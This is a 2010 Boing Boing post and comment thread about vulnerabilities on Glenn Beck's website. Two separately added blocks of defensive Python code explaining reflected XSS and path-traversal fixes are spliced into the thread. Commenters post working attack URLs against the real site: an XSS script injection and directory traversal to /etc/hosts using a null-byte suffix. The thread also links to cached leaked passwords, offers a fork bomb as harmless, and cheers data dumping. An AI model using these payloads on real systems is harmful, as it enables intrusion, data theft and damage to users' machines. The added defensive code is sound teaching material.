Glenn Beck's website gives him something to cry about

Glenn Beck's website, it turns out, can be manipulated into doing strange and NSFW things by messing with the URL. An insecure PHP utility accessible at the site allows for shenanigans like directory traversal, exposing all sorts of things that should not be exposed. Like password files, and a user group named for Rush Limbaugh. [Thanks, Dean!] Update: the discussion thread is down. Here's the Google cache of it.

24 Comments

caribou #1 9:55 AM Thursday, Jul 29, 2010

Also, the linked site can be manipulated into falling down, if you BoingBoing it and they can't handle the traffic?


Software error:

Too many connections at Board/Mysql.pm line 31.

Anon #2 9:56 AM Thursday, Jul 29, 2010

http://webcache.googleusercontent.com/search?strip=1&q=cache:http%3A%2F%2Fgreen-oval.net%2Fcgi-board.pl%2Fg%2Fthread%2F12376999

Google cache of board (currently down) with passwords. Get 'em before the cache gets pulled by Google....

bardfinn #3 9:57 AM Thursday, Jul 29, 2010

Indeed. Rather than being dot dot slashed, the site is slashdotted.

Tim #4 10:09 AM Thursday, Jul 29, 2010

Glenn Beck's website can also give you something to cry about: the realization that people actually listen to him.

romulusnr #5 10:29 AM Thursday, Jul 29, 2010

This is devious, malicious hacking. Glenn Beck will not lie idle in the face of terrorist hackers. He will call for stronger anti-hacking laws.

He will call the cyber police, and consequences will never be the same.

Eris Siva #6 10:31 AM Thursday, Jul 29, 2010

Looks like nothing happened. Poor guy.
Kind of deserved it had anything ACTUALLY happened.

I was really rooting for them to get an email dump in Palinesque style.

OCNCTY #7 10:34 AM Thursday, Jul 29, 2010

@ romulusnr

I'm sure they can back trace that kind of thing easily.

xCleverPoet #8 10:35 AM Thursday, Jul 29, 2010

Wow, that is epic. I love the huge Cybersecurity Carbonite ad on the site. "I trust Carbonite to protect my priceless computer files-you should too."

Oh and um:
http://www.glennbeck.com/search/results.php?q=%22%3E%3Cscript+type%3D%22text/javascript%22%3E+alert%28%27xCleverPoet+is+awesome+!%27%29+%3C/script%3E&submit.x=0&submit.y=0
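
An added example, not part of the thread and not code from glennbeck.com: the URL in the comment above carries its search term back into the results page unescaped, which is a reflected cross-site scripting bug. The snippet below takes the `q` parameter exactly as that URL encodes it and renders it two ways, once spliced raw into the markup (the behaviour the comment demonstrates) and once through `html.escape`, so the difference is visible in the output. The attribute-plus-body template, the function names and `contains_script_tag` are assumptions for illustration; the site's real `results.php` template is not on this page.

```python
# Added example: reflected XSS in a search results page, unsafe vs. escaped rendering.
# Not the site's code; the template below is an assumed stand-in for results.php.
from html import escape
from urllib.parse import parse_qs, urlsplit

# The URL quoted in the comment above (constructed here as sample input).
RESULTS_URL = (
    "http://www.glennbeck.com/search/results.php?q=%22%3E%3Cscript+type%3D%22text/"
    "javascript%22%3E+alert%28%27xCleverPoet+is+awesome+!%27%29+%3C/script%3E"
    "&submit.x=0&submit.y=0"
)


def search_term_from_url(url: str) -> str:
    """Return the percent-decoded 'q' parameter, as results.php would receive it."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_unsafe(q: str) -> str:
    """Vulnerable pattern: the term is spliced raw into an attribute value and the body.

    The leading '">' in the comment's payload closes the value attribute and the
    input tag, so everything after it becomes live markup.
    """
    return f'<input name="q" value="{q}"><p>Results for {q}</p>'


def render_safe(q: str) -> str:
    """Fixed pattern: escape(quote=True) rewrites <, >, &, " and ' as entities.

    Browsers decode the entities back to the original characters for display,
    so the user still sees their search term, but no tag or attribute boundary
    can be opened from inside it.
    """
    safe = escape(q, quote=True)
    return f'<input name="q" value="{safe}"><p>Results for {safe}</p>'


def contains_script_tag(html: str) -> bool:
    """Crude check used only to compare the two renderings: is a <script tag present?"""
    return "<script" in html.lower()


if __name__ == "__main__":
    term = search_term_from_url(RESULTS_URL)
    print("decoded q:", term)
    print("unsafe has <script>:", contains_script_tag(render_unsafe(term)))
    print("safe has <script>:  ", contains_script_tag(render_safe(term)))
```

Escaping at the point where untrusted text meets HTML is the fix; filtering the query string for the word "script" is not, since the same bug is reachable with any other tag or event attribute.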

xCleverPoet replied to comment from Ted8305 #10 10:53 AM Thursday, Jul 29, 2010

Not exactly sure that modifying an existing URL is a crime. :-)

romulusnr #11 11:03 AM Thursday, Jul 29, 2010

BTW the "user group named after rush limbaugh" -- This is apparently the main server for Premiere Radio Networks, and hosts more than just Glenn Beck's site but also Rush's, Steve Harvey's, Dr. Laura's, and other Premiere Radio hosts. So the "user group named after rush" is just the result of Red Hat's "User Private Group" paradigm which creates a group for every new user.

PS I know this solely from what has been posted to greenoval. IANAL, TNO, TINC, IYKWIMAIKYD.

the_headless_rabbit #12 12:02 PM Thursday, Jul 29, 2010

When I follow the link, I get this:

You done goofed!
Prepare to be back-traced.

WTF?

Glen, are your website warnings/threats as incoherent as your show? wow!

Anon replied to comment from romulusnr #13 12:03 PM Thursday, Jul 29, 2010

Interesting! From that, I'm guessing that the "coast" user is for Coast to Coast AM, which is (sadly) another Premiere show...

the_headless_rabbit replied to comment from the_headless_rabbit #14 12:05 PM Thursday, Jul 29, 2010

wait, wait, I get it now....never mind, I'm a little slow today....

Anon replied to comment from the_headless_rabbit #15 12:41 PM Thursday, Jul 29, 2010

If anyone tells you to do a series of actions on your mac that ends with typing "rm -rf /*" and hitting enter, please don't do it.

You can do this though :(){ :|:& };: it won't hurt... much...

SamSam #16 1:21 PM Thursday, Jul 29, 2010

So besides the silly alert-box hacking, it looks like they were able to get the DB username and password. But it doesn't seem as if anyone has been adding or modifying files. But given that /b/ knows about this, that kind of self-restraint is simply not computable. So I'm guessing I'm missing something?

Griffin replied to comment from SamSam #17 1:45 PM Thursday, Jul 29, 2010

What does /b have to do with this? I mean, I assume they know by now, but I haven't seen any indication that they have anything to do with it.

dequeued #18 1:59 PM Thursday, Jul 29, 2010

Did anyone see the etc hosts file?

Not saying I did, that would be illegal, of course.

But my friend did.
http://media.glennbeck.com/app/getfile.php?filename=../../../../../../../../../../../../../../../../../../etc/httpd/conf/hosts

It seems to have internal map of other clear-channel hosts: http://glenbeck.pastebin.com/0G3F91hq

dequeued #19 2:01 PM Thursday, Jul 29, 2010

Oops, malformed URL, it's actually
http://media.glennbeck.com/app/getfile.php?filename=../../../../../../../../../../../../../../../../../../etc/hosts%00

It's funny that a simple logical error like directory traversal is still a problem, it's been like what, 25 years?

lulz
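
An added example, not part of the thread and not code from glennbeck.com or Boing Boing: the two `getfile.php` URLs posted in the comments above show the two ingredients of this bug, a run of `../` components that walks out of the download directory, and a trailing `%00` (a NUL byte, which in older PHP truncated the filename the C-level file call actually saw, discarding any extension the script appended). The handler below shows how a file-serving endpoint keeps a user-supplied name inside its base directory: it rejects NUL bytes, absolute paths and any `..` component before touching the disk, and then resolves the candidate (symlinks included) and requires it to still lie under the resolved base. The base directory `/var/www/media/files`, the function names and the sample URLs are assumptions; the page does not show the real script's layout.

```python
# Added example: safe mapping of a ?filename= parameter onto a file under a base
# directory. Not the site's code; BASE_DIR is an assumed download root.
import tempfile
from pathlib import Path
from urllib.parse import parse_qs, urlsplit

BASE_DIR = Path("/var/www/media/files")  # assumed; the real layout is unknown


class InvalidFilename(ValueError):
    """Raised when a requested name must not be served."""


def filename_from_url(url: str) -> str:
    """Return the percent-decoded 'filename' parameter, as PHP would receive it.

    parse_qs decodes %00 to a real NUL byte, so the check below sees it.
    """
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    values = params.get("filename")
    if not values:
        raise InvalidFilename("missing filename parameter")
    return values[0]


def resolve_download_path(filename: str, base_dir: Path = BASE_DIR) -> Path:
    """Map a user-supplied name to a path inside base_dir, or raise InvalidFilename.

    Three independent checks; any one of them alone stops the URLs in the thread:
      1. a NUL byte is rejected outright (the %00 trick relied on it);
      2. absolute paths, empty names and any '..' component are rejected
         lexically, before any filesystem access;
      3. the candidate is resolved, following symlinks, and must still be
         located under the resolved base directory.
    """
    if "\x00" in filename:
        raise InvalidFilename("embedded NUL byte")
    candidate = Path(filename)
    if candidate.is_absolute() or not candidate.parts or ".." in candidate.parts:
        raise InvalidFilename("absolute path, empty name or traversal component")
    base_resolved = base_dir.resolve()
    resolved = (base_resolved / candidate).resolve()
    try:
        resolved.relative_to(base_resolved)
    except ValueError:
        raise InvalidFilename("resolved path escapes the base directory") from None
    return resolved


def relative_served_path(filename: str, base_dir: Path = BASE_DIR) -> str:
    """The accepted path expressed relative to the base, for display and logging."""
    return str(resolve_download_path(filename, base_dir).relative_to(base_dir.resolve()))


def is_served(url: str, base_dir: Path = BASE_DIR) -> bool:
    """True if the handler would serve the file named in url, False if it refuses."""
    try:
        resolve_download_path(filename_from_url(url), base_dir)
        return True
    except InvalidFilename:
        return False


def symlink_escape_is_rejected() -> bool:
    """Show why check 3 matters: a symlink inside the base that points at '/'.

    Builds a throwaway base directory, plants 'escape' -> '/', and asks for
    'escape/etc/hosts', which is lexically clean but resolves outside the base.
    """
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp) / "files"
        base.mkdir()
        (base / "escape").symlink_to("/", target_is_directory=True)
        try:
            resolve_download_path("escape/etc/hosts", base)
        except InvalidFilename:
            return True
        return False


if __name__ == "__main__":
    # Constructed sample requests: one legitimate, the two shapes seen in the thread.
    for url in (
        "http://media.glennbeck.com/app/getfile.php?filename=podcast/show.mp3",
        "http://media.glennbeck.com/app/getfile.php?filename=../../../../etc/httpd/conf/hosts",
        "http://media.glennbeck.com/app/getfile.php?filename=../../etc/hosts%00",
    ):
        print("served" if is_served(url) else "refused", url)
    print("symlink escape rejected:", symlink_escape_is_rejected())
```

The lexical check (step 2) is what most "fixes" consist of, and it is not enough on its own: a symlink or a later `..`-free rename inside the tree can still point outside it, which is why the resolved path is compared against the resolved base as well. Logging the refused names is also the cheapest detection available for this class of bug, since a legitimate client never sends `../` or a NUL byte.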

Anon #20 2:01 PM Thursday, Jul 29, 2010

Oh god! There is a 99% chance that you have root access to the website and 70% chance that you have root access to the server. This means that the online world now owns his website and server. Please somebody with balls and humor use it for something intelligent or dig through the server and find his private porn collection or something.

dequeued #21 2:05 PM Thursday, Jul 29, 2010

I wish boingboing had waited just a few more hours before publishing this, so that anonymous would have had time to work; they didn't figure it out until about 1pm EST.

I know for a fact that the mysql database was logged into and all of the tables dumped.

As far as I know, nobody modified the content of the site, but I believe that Mr Beck's mailing list will be up on a torrent soon.

ethancoop #22 6:09 PM Thursday, Jul 29, 2010

Someone explain this to me, I've got no clue what it means.

rumpel #23 10:32 AM Friday, Jul 30, 2010

So what may happen if someone actually downloaded a file from the server?

bytefyre #24 7:32 AM Saturday, Jul 31, 2010

someone should call in to the radio program and say in a ridiculously exaggerated southern drawl "so, I heard you folks use red hat, you know there are commies associated with Linux (pause) OH MY GOD JEB, OH. MY. GAWD. GLENN BECK IS A COMMIE!" it would be quite funny I think.

This work is licensed under a Creative Commons License permitting non-commercial sharing with attribution. Boing Boing is a trademark of Happy Mutants LLC in the United States and other countries.